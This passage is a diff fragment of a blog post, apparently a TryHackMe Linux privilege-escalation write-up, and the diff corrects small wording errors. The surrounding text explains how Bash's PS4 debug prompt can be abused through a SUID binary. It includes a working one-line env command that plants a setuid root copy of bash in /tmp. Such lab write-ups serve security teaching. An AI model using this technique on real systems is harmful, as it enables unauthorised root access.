dvdmtw98/blog/Post Vault/articles/2021-03-16-tryhackme-linux-privesc.md

 > No answer required

-### Task 15 : SUID / SGID Executables - Abusing Shell Features (#2)
+### Task 15: SUID / SGID Executables - Abusing Shell Features (#2)

 This exploit does not work on "**Bash version 4.4 and above**".

 When in debugging mode, Bash uses the environment variable **PS4** to display an extra prompt for debugging statements.
-We can modify the PS4 prompt to code that will spawn root shell.
+We can modify the PS4 prompt to code that will spawn a root shell.

 ```
 env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2